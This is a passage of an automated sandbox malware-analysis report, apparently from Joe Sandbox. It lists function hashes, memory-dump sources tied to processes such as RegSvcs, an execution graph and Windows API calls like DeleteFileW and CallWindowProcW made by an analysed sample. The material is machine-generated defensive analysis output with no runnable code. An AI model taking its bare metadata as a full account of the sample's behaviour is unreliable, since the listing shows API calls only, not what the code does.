                                                                  Function 04CE26E0 Relevance: 12.7, Strings: 10, Instructions: 179COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                  • API String ID: 0-3121157708
                                                                  • Opcode ID: aba65b16e9ba08ce4d2cbfb35ab771cce4261e70ba11b163a1abc8d34561dbd8
                                                                  • Instruction ID: a30cc6aff2bb7977685d0356acb4dc72951cfe42eacc5830edf63df71a9730b2
                                                                  • Opcode Fuzzy Hash: aba65b16e9ba08ce4d2cbfb35ab771cce4261e70ba11b163a1abc8d34561dbd8
                                                                  • Instruction Fuzzy Hash: 60716F30E0130ACBCB08EFB9D8505DDBBB2FF80700F614A29D059AB255EF74695ACB91
                                                                  Function 04CE26F0 Relevance: 12.7, Strings: 10, Instructions: 172COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                  • API String ID: 0-3121157708
                                                                  • Opcode ID: 398e2c178fd2eb15a9725d76bb6196e141a290dcad947ffbd615cdd10b33876a
                                                                  • Instruction ID: 15a3802ef8b6dec98f1afcd00047c1f8f45c453c704f40daec82396a636c6be0
                                                                  • Opcode Fuzzy Hash: 398e2c178fd2eb15a9725d76bb6196e141a290dcad947ffbd615cdd10b33876a
                                                                  • Instruction Fuzzy Hash: 2E713D30E0130A8BCB08EFB9D8546DDB7B2FF84700F614A28D0596B259EF74695ACB95

                                                                  Execution Graph

                                                                  Execution Coverage:10.2%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:150
                                                                  Total number of Limit Nodes:13
                                                                  execution_graph 40098 5e82a48 DuplicateHandle 40099 5e82ade 40098->40099 40100 27a7358 40101 27a739e DeleteFileW 40100->40101 40103 27a73d7 40101->40103 40114 27a0848 40116 27a084e 40114->40116 40115 27a091b 40116->40115 40122 27a1390 40116->40122 40127 27a14c0 40116->40127 40132 5e816f8 40116->40132 40136 5e816e8 40116->40136 40140 5e8177a 40116->40140 40123 27a1367 40122->40123 40124 27a1393 40122->40124 40123->40116 40124->40123 40126 27a14c0 GlobalMemoryStatusEx 40124->40126 40146 27a7530 40124->40146 40126->40124 40129 27a13a6 40127->40129 40128 27a14b8 40128->40116 40129->40128 40130 27a7530 GlobalMemoryStatusEx 40129->40130 40131 27a14c0 GlobalMemoryStatusEx 40129->40131 40130->40129 40131->40129 40133 5e81707 40132->40133 40159 5e80dc4 40133->40159 40137 5e81707 40136->40137 40138 5e80dc4 GetModuleHandleW 40137->40138 40139 5e81728 40138->40139 40139->40116 40141 5e81712 40140->40141 40145 5e81782 40140->40145 40142 5e80dc4 GetModuleHandleW 40141->40142 40144 5e8174f 40141->40144 40143 5e81728 40142->40143 40143->40116 40144->40116 40145->40116 40147 27a753a 40146->40147 40148 27a7554 40147->40148 40151 5e9d6df 40147->40151 40155 5e9d6f0 40147->40155 40148->40124 40152 5e9d6f0 40151->40152 40153 5e9d91a 40152->40153 40154 5e9d930 GlobalMemoryStatusEx 40152->40154 40153->40148 40154->40152 40157 5e9d705 40155->40157 40156 5e9d91a 40156->40148 40157->40156 40158 5e9d930 GlobalMemoryStatusEx 40157->40158 40158->40157 40160 5e80dcf 40159->40160 40163 5e8259c 40160->40163 40162 5e830ae 40162->40162 40165 5e825a7 40163->40165 40164 5e837d4 40164->40162 40165->40164 40167 5e85060 40165->40167 40168 5e85081 40167->40168 40169 5e850a5 40168->40169 40172 5e85618 40168->40172 40176 5e85030 40168->40176 40169->40164 40173 5e85625 40172->40173 40174 5e8565e 40173->40174 40180 5e85204 40173->40180 40174->40169 40177 5e85624 40176->40177 40178 5e8565e 40177->40178 40179 5e85204 GetModuleHandleW 40177->40179 40178->40169 40179->40178 40181 5e8520f 40180->40181 40183 5e856d0 40181->40183 40184 5e85238 40181->40184 40183->40183 40185 5e85243 40184->40185 40191 5e85248 40185->40191 40187 5e8573f 40195 5e8aa60 40187->40195 40200 5e8aa48 40187->40200 40188 5e85779 40188->40183 40194 5e85253 40191->40194 40192 5e869c8 40192->40187 40193 5e85060 GetModuleHandleW 40193->40192 40194->40192 40194->40193 40197 5e8aa64 40195->40197 40196 5e8aa9d 40196->40188 40197->40196 40205 5e8acc8 40197->40205 40209 5e8acd8 40197->40209 40202 5e8aa60 40200->40202 40201 5e8aa9d 40201->40188 40202->40201 40203 5e8acc8 GetModuleHandleW 40202->40203 40204 5e8acd8 GetModuleHandleW 40202->40204 40203->40201 40204->40201 40206 5e8acd8 40205->40206 40212 5e8ad18 40206->40212 40207 5e8ace2 40207->40196 40211 5e8ad18 GetModuleHandleW 40209->40211 40210 5e8ace2 40210->40196 40211->40210 40214 5e8ad1d 40212->40214 40213 5e8ad5c 40213->40207 40214->40213 40215 5e8af60 GetModuleHandleW 40214->40215 40216 5e8af8d 40215->40216 40216->40207 40104 5e82800 40105 5e82846 GetCurrentProcess 40104->40105 40107 5e82898 GetCurrentThread 40105->40107 40109 5e82891 40105->40109 40108 5e828d5 GetCurrentProcess 40107->40108 40110 5e828ce 40107->40110 40113 5e8290b 40108->40113 40109->40107 40110->40108 40111 5e82933 GetCurrentThreadId 40112 5e82964 40111->40112 40113->40111 40217 5e8cf10 40218 5e8cf78 CreateWindowExW 40217->40218 40220 5e8d034 40218->40220 40221 e2d01c 40222 e2d034 40221->40222 40223 e2d08e 40222->40223 40228 5e8d0c8 40222->40228 40232 5e8d0b7 40222->40232 40236 5e89eac 40222->40236 40245 5e8e218 40222->40245 40229 5e8d0ee 40228->40229 40230 5e89eac CallWindowProcW 40229->40230 40231 5e8d10f 40230->40231 40231->40223 40233 5e8d0c5 40232->40233 40234 5e89eac CallWindowProcW 40233->40234 40235 5e8d10f 40234->40235 40235->40223 40237 5e89eb7 40236->40237 40238 5e8e289 40237->40238 40240 5e8e279 40237->40240 40270 5e8de7c 40238->40270 40254 5e8e47c 40240->40254 40260 5e8e3a0 40240->40260 40265 5e8e3b0 40240->40265 40241 5e8e287 40247 5e8e228 40245->40247 40246 5e8e289 40248 5e8de7c CallWindowProcW 40246->40248 40247->40246 40249 5e8e279 40247->40249 40250 5e8e287 40248->40250 40251 5e8e47c CallWindowProcW 40249->40251 40252 5e8e3a0 CallWindowProcW 40249->40252 40253 5e8e3b0 CallWindowProcW 40249->40253 40251->40250 40252->40250 40253->40250 40255 5e8e43a 40254->40255 40256 5e8e48a 40254->40256 40274 5e8e468 40255->40274 40277 5e8e458 40255->40277 40257 5e8e450 40257->40241 40261 5e8e3b0 40260->40261 40263 5e8e468 CallWindowProcW 40261->40263 40264 5e8e458 CallWindowProcW 40261->40264 40262 5e8e450 40262->40241 40263->40262 40264->40262 40267 5e8e3c4 40265->40267 40266 5e8e450 40266->40241 40268 5e8e468 CallWindowProcW 40267->40268 40269 5e8e458 CallWindowProcW 40267->40269 40268->40266 40269->40266 40271 5e8de87 40270->40271 40272 5e8f6ea CallWindowProcW 40271->40272 40273 5e8f699 40271->40273 40272->40273 40273->40241 40275 5e8e479 40274->40275 40281 5e8f620 40274->40281 40275->40257 40278 5e8e468 40277->40278 40279 5e8e479 40278->40279 40280 5e8f620 CallWindowProcW 40278->40280 40279->40257 40280->40279 40282 5e8de7c CallWindowProcW 40281->40282 40283 5e8f63a 40282->40283 40283->40275

                                                                  Executed Functions

                                                                  Function 05E827FA Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1533 5e827fa-5e8288f GetCurrentProcess 1538 5e82898-5e828cc GetCurrentThread 1533->1538 1539 5e82891-5e82897 1533->1539 1540 5e828ce-5e828d4 1538->1540 1541 5e828d5-5e82909 GetCurrentProcess 1538->1541 1539->1538 1540->1541 1543 5e8290b-5e82911 1541->1543 1544 5e82912-5e8292d call 5e829d0 1541->1544 1543->1544 1546 5e82933-5e82962 GetCurrentThreadId 1544->1546 1548 5e8296b-5e829cd 1546->1548 1549 5e82964-5e8296a 1546->1549 1549->1548
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 05E8287E
                                                                  • GetCurrentThread.KERNEL32 ref: 05E828BB
                                                                  • GetCurrentProcess.KERNEL32 ref: 05E828F8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 05E82951
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3353745230.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_5e80000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: b407427be0f9e4078a28e4a556d6eba374ab751d445238ffc7e7dc49324dcc65
                                                                  • Instruction ID: 1d45c6f260c714b4abb8aaf9e059c9a608f3c9cd5a3314fdb2a5e063188ccb12
                                                                  • Opcode Fuzzy Hash: b407427be0f9e4078a28e4a556d6eba374ab751d445238ffc7e7dc49324dcc65
                                                                  • Instruction Fuzzy Hash: F95186B49002098FDB14EFAAC549BAEBFF1FF48304F208059E159A7361DB389944CB65
                                                                  Function 05E82800 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1556 5e82800-5e8288f GetCurrentProcess 1560 5e82898-5e828cc GetCurrentThread 1556->1560 1561 5e82891-5e82897 1556->1561 1562 5e828ce-5e828d4 1560->1562 1563 5e828d5-5e82909 GetCurrentProcess 1560->1563 1561->1560 1562->1563 1565 5e8290b-5e82911 1563->1565 1566 5e82912-5e8292d call 5e829d0 1563->1566 1565->1566 1568 5e82933-5e82962 GetCurrentThreadId 1566->1568 1570 5e8296b-5e829cd 1568->1570 1571 5e82964-5e8296a 1568->1571 1571->1570
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 05E8287E
                                                                  • GetCurrentThread.KERNEL32 ref: 05E828BB
                                                                  • GetCurrentProcess.KERNEL32 ref: 05E828F8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 05E82951
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3353745230.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_5e80000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: 7ffc112836a2aced6fc3c9fc7f454918afaa3b143f381af8e05f512c701f13cb
                                                                  • Instruction ID: 6cf451eec9bbbe8cb6778c443b24704b233bab78e37c0034aba8083fe8fe5093
                                                                  • Opcode Fuzzy Hash: 7ffc112836a2aced6fc3c9fc7f454918afaa3b143f381af8e05f512c701f13cb
                                                                  • Instruction Fuzzy Hash: A05165B49003098FDB14EFAAD549BAEBFF1FF48314F208059E159A7361DB385984CB65
                                                                  Function 05E8AD18 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 05E8AF7E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3353745230.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_5e80000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: b2ee858d7b004651469637a0750f713dcec0aa2b6297d8a88e29666e44152908
                                                                  • Instruction ID: 5af1a8fb32e38b3f2d0a2fabc6092e6886cca29c64d7916e02052f0427049e23
                                                                  • Opcode Fuzzy Hash: b2ee858d7b004651469637a0750f713dcec0aa2b6297d8a88e29666e44152908
                                                                  • Instruction Fuzzy Hash: 39813770A00B058FD724EF29D4457AABBF6FF88318F00992ED48AD7A50DB75E945CB90
                                                                  Function 05E9E4F8 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3353859012.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_5e90000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b867f94df09e49e2f7ac275f9b756a0b3775730e271c70b3277c6deeab3d10ab
                                                                  • Instruction ID: a6f2ae62f7772aa890b1148e129334c2d74e2dd4aaa837d85fddf0f06171213d
                                                                  • Opcode Fuzzy Hash: b867f94df09e49e2f7ac275f9b756a0b3775730e271c70b3277c6deeab3d10ab
                                                                  • Instruction Fuzzy Hash: 20412672E043958FCB08DF69D81069ABFF9EF89210F14856AD548A7281EB789845CBE1
                                                                  Function 05E8CF04 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E8D022
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3353745230.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_5e80000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 336cb1cb8352844d5f8e1588d2805aa140c1cd7415f3631a4da236b75bcb8c5d
                                                                  • Instruction ID: 254ec14e50ea9be94082a822ced72e94a972ae4f5b1acb932b6a880e348e86ac
                                                                  • Opcode Fuzzy Hash: 336cb1cb8352844d5f8e1588d2805aa140c1cd7415f3631a4da236b75bcb8c5d
                                                                  • Instruction Fuzzy Hash: FA51D0B1D003099FDB14DFA9C984ADEBBB6FF48314F64812AE819AB250D7749845CF90
                                                                  Function 05E8CF10 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E8D022
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3353745230.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_5e80000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 22fbdca36e9ef0d2a7a544ff44d7b83a693c09f60b557d53a8098cbbe798677f
                                                                  • Instruction ID: 65c1534412cb405574a39eb49dc9082f2c070f808b847b929eb9a7ad4a1ee0ac
                                                                  • Opcode Fuzzy Hash: 22fbdca36e9ef0d2a7a544ff44d7b83a693c09f60b557d53a8098cbbe798677f
                                                                  • Instruction Fuzzy Hash: 9141E0B1D00309DFDB14DF99C984ADEBBB6FF48304F64822AE819AB250D774A845CF90
                                                                  Function 05E8DE7C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 05E8F711
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3353745230.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_5e80000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CallProcWindow
                                                                  • String ID:
                                                                  • API String ID: 2714655100-0
                                                                  • Opcode ID: 9d974e9d826d61950ffd5f73dec6af1a7016d0bedad87becfe33b5a67b18be0c
                                                                  • Instruction ID: 9c0138686c47d210de6c28f25ed667a64d48ad1b0d7c29d4b1781c972dbc80bd
                                                                  • Opcode Fuzzy Hash: 9d974e9d826d61950ffd5f73dec6af1a7016d0bedad87becfe33b5a67b18be0c
                                                                  • Instruction Fuzzy Hash: B24169B9A00205CFDB04DF99C888AAABBF6FF88314F24C549D51DA7321D775A841CFA0
                                                                  Function 05E82A40 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05E82ACF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3353745230.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_5e80000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 082f834726775e79ac216f1c012e7fee54a7814215567240a435b06625732da3
                                                                  • Instruction ID: f93f78e17229906dfbb804e1e1df90fea817c0c7523c8704511b58ace5602899
                                                                  • Opcode Fuzzy Hash: 082f834726775e79ac216f1c012e7fee54a7814215567240a435b06625732da3
                                                                  • Instruction Fuzzy Hash: BF21E5B5D002489FDB10DF9AD984AEEBBF9FB48310F14845AE958A3210D378A954DFA1
                                                                  Function 05E82A48 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05E82ACF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3353745230.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_5e80000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: c66901d1512866c49c06fec55b9fb21650db52f466521bb0be4bd36210a3e28d
                                                                  • Instruction ID: 2950801f833087f9bca5c3fcb7b6f3af450430a80d9998c513cf4c76a20a82b4
                                                                  • Opcode Fuzzy Hash: c66901d1512866c49c06fec55b9fb21650db52f466521bb0be4bd36210a3e28d
                                                                  • Instruction Fuzzy Hash: A421E4B5D002089FDB10DF9AD984AEEBBF9FF48310F14805AE918A3310D378A940CFA0
                                                                  Function 027A7351 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteFileW.KERNELBASE(00000000), ref: 027A73C8
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3345951905.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_27a0000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID:
                                                                  • API String ID: 4033686569-0
                                                                  • Opcode ID: 0d732af57b8f974be0078e519995067f264b36cfda8bf5fa66c45ffb225c0ba6
                                                                  • Instruction ID: 73bfe803570a5628d0a3541501ff8c1239a34f26a89056f73c0b0ea729910a57
                                                                  • Opcode Fuzzy Hash: 0d732af57b8f974be0078e519995067f264b36cfda8bf5fa66c45ffb225c0ba6
                                                                  • Instruction Fuzzy Hash: C32158B1C0065A8BCB14CF9AC9447EEFBB0EF48320F11826AD818A7240D738A944CFE1
                                                                  Function 027A7358 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteFileW.KERNELBASE(00000000), ref: 027A73C8
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3345951905.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_27a0000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID:
                                                                  • API String ID: 4033686569-0
                                                                  • Opcode ID: c7b843be6a60c71a3a4f464b7d41c040a8d81d820fe933950b67c443371a1a77
                                                                  • Instruction ID: d93d36bfae5dbee22800f32c456d1f91db9fb12a8121a4124b226b523e28994f
                                                                  • Opcode Fuzzy Hash: c7b843be6a60c71a3a4f464b7d41c040a8d81d820fe933950b67c443371a1a77
                                                                  • Instruction Fuzzy Hash: 3C1147B1C006599BCB14DF9AD5447AEFBF4FF48320F11822AD818A7240D738A944CFE1
                                                                  Function 05E9E5E0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNELBASE(?), ref: 05E9E647
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3353859012.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_5e90000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  • Opcode ID: 34761c97c10a70a0926f1ee332823d170348649e604d9eab16036f424ddf8521
                                                                  • Instruction ID: e7c6814cbbd6985bb33302f6f4c2defa0a960a43ffeb47b11a010fbd39650c20
                                                                  • Opcode Fuzzy Hash: 34761c97c10a70a0926f1ee332823d170348649e604d9eab16036f424ddf8521
                                                                  • Instruction Fuzzy Hash: D2111FB1C0065A9BCB10DF9AC544B9EFBF8BF48320F14812AD918A7240D778A940CFA5
                                                                  Function 05E8AF18 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 05E8AF7E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3353745230.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_5e80000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 1e09f162de345d0cb7f60e3e6466797ecfcfbede7f1468503a3ff6149a508f46
                                                                  • Instruction ID: ed69d8e43ac700dcbe69657d989721127a142a7d56a680187a7dd00d099c7817
                                                                  • Opcode Fuzzy Hash: 1e09f162de345d0cb7f60e3e6466797ecfcfbede7f1468503a3ff6149a508f46
                                                                  • Instruction Fuzzy Hash: 5F1110B6C003498FDB10DF9AC444ADEFBF5EF88324F10842AD859A7200C379A545CFA1
                                                                  Function 00E2D01C Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3345508769.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_e2d000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 07bd0047fbb43175d60939466fedc9184b3c9974b6eaf35803e212215bb893ff
                                                                  • Instruction ID: fc43286e52ca711e96fb5c864155adb86909340d4fa07fb265811ce65ffd7c79
                                                                  • Opcode Fuzzy Hash: 07bd0047fbb43175d60939466fedc9184b3c9974b6eaf35803e212215bb893ff
                                                                  • Instruction Fuzzy Hash: 4A21F571508244DFCB15DF24E984F16BF66FB84314F20C569DA4A5B2A6C33AD807CA61
                                                                  Function 00E2D005 Relevance: .1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3345508769.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_e2d000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 952eae285d5addbb019417177c045619476d779d0bbc3cbeebfcd32c09e00c51
                                                                  • Instruction ID: 5f425a6a30b1d076647e2c0b8e667d805334a45dc205fe7fda8043b63f1d28c0
                                                                  • Opcode Fuzzy Hash: 952eae285d5addbb019417177c045619476d779d0bbc3cbeebfcd32c09e00c51
                                                                  • Instruction Fuzzy Hash: 4121537550D3808FD712CF24D994B15BF72EB46314F28C5DAD9498B6A7C33A980ACB62

                                                                  Executed Functions

                                                                  Function 01151230 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2254523904.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_1150000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: tP]q
                                                                  • API String ID: 0-2175968468
                                                                  • Opcode ID: e2add760856e1124ee2c2bed6d0a6fe400396fa45cff8ed76a68e2e5c23d4f2d
                                                                  • Instruction ID: 0107c379c31139dccdd204e723dad521a3db2ef1ee24e8de26c7b214c147ac67
                                                                  • Opcode Fuzzy Hash: e2add760856e1124ee2c2bed6d0a6fe400396fa45cff8ed76a68e2e5c23d4f2d
                                                                  • Instruction Fuzzy Hash: CF3128747416108FCB69AF38C46895D7BF6AF8A71635608B9E506CF3B2DA35DC42CB80
                                                                  Function 01151240 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2254523904.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_1150000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: tP]q
                                                                  • API String ID: 0-2175968468
                                                                  • Opcode ID: b58c09199e8fd41d289b712d9e17a67ff3d70731ff56648f644840ffd92688fb
                                                                  • Instruction ID: 2a1fea3edcfc612c0b94de70c70b3e15237e29dfbffcd33328046f5d995816de
                                                                  • Opcode Fuzzy Hash: b58c09199e8fd41d289b712d9e17a67ff3d70731ff56648f644840ffd92688fb
                                                                  • Instruction Fuzzy Hash: 392105347412118FCB6DAB39C55891D7BE6AF8972636508B8E506CF3B5DB36EC42CB80
                                                                  Function 01151AE0 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2254523904.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_1150000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8aq
                                                                  • API String ID: 0-538729646
                                                                  • Opcode ID: 42afcc7724f09704e494682f60afa2fedccaa92dd5ddfa944b704daa9facfa83
                                                                  • Instruction ID: 8e98d60bc7b9f98e0759c43ef836258cf9a191b8f94c3c638074bdfb452f4d91
                                                                  • Opcode Fuzzy Hash: 42afcc7724f09704e494682f60afa2fedccaa92dd5ddfa944b704daa9facfa83
                                                                  • Instruction Fuzzy Hash: 1C118434A402046FC755EFB8D494BEE7BB5AF89240F1040A9D649DB395DF349D06CB51
                                                                  Function 01151340 Relevance: .5, Instructions: 526COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2254523904.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_1150000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ab29f6cb9a8d06c827d3e33d533f257539eeef340032b01021929004dae80c04
                                                                  • Instruction ID: a805ccb82bca6d65ca3f1b5bed9becd7f37c8de522aeec3d7bbd99811165bb48
                                                                  • Opcode Fuzzy Hash: ab29f6cb9a8d06c827d3e33d533f257539eeef340032b01021929004dae80c04
                                                                  • Instruction Fuzzy Hash: FD227034700206EFD76AEF34D49476A77B7BB88704B118929D896CB389DB36EC46CB41
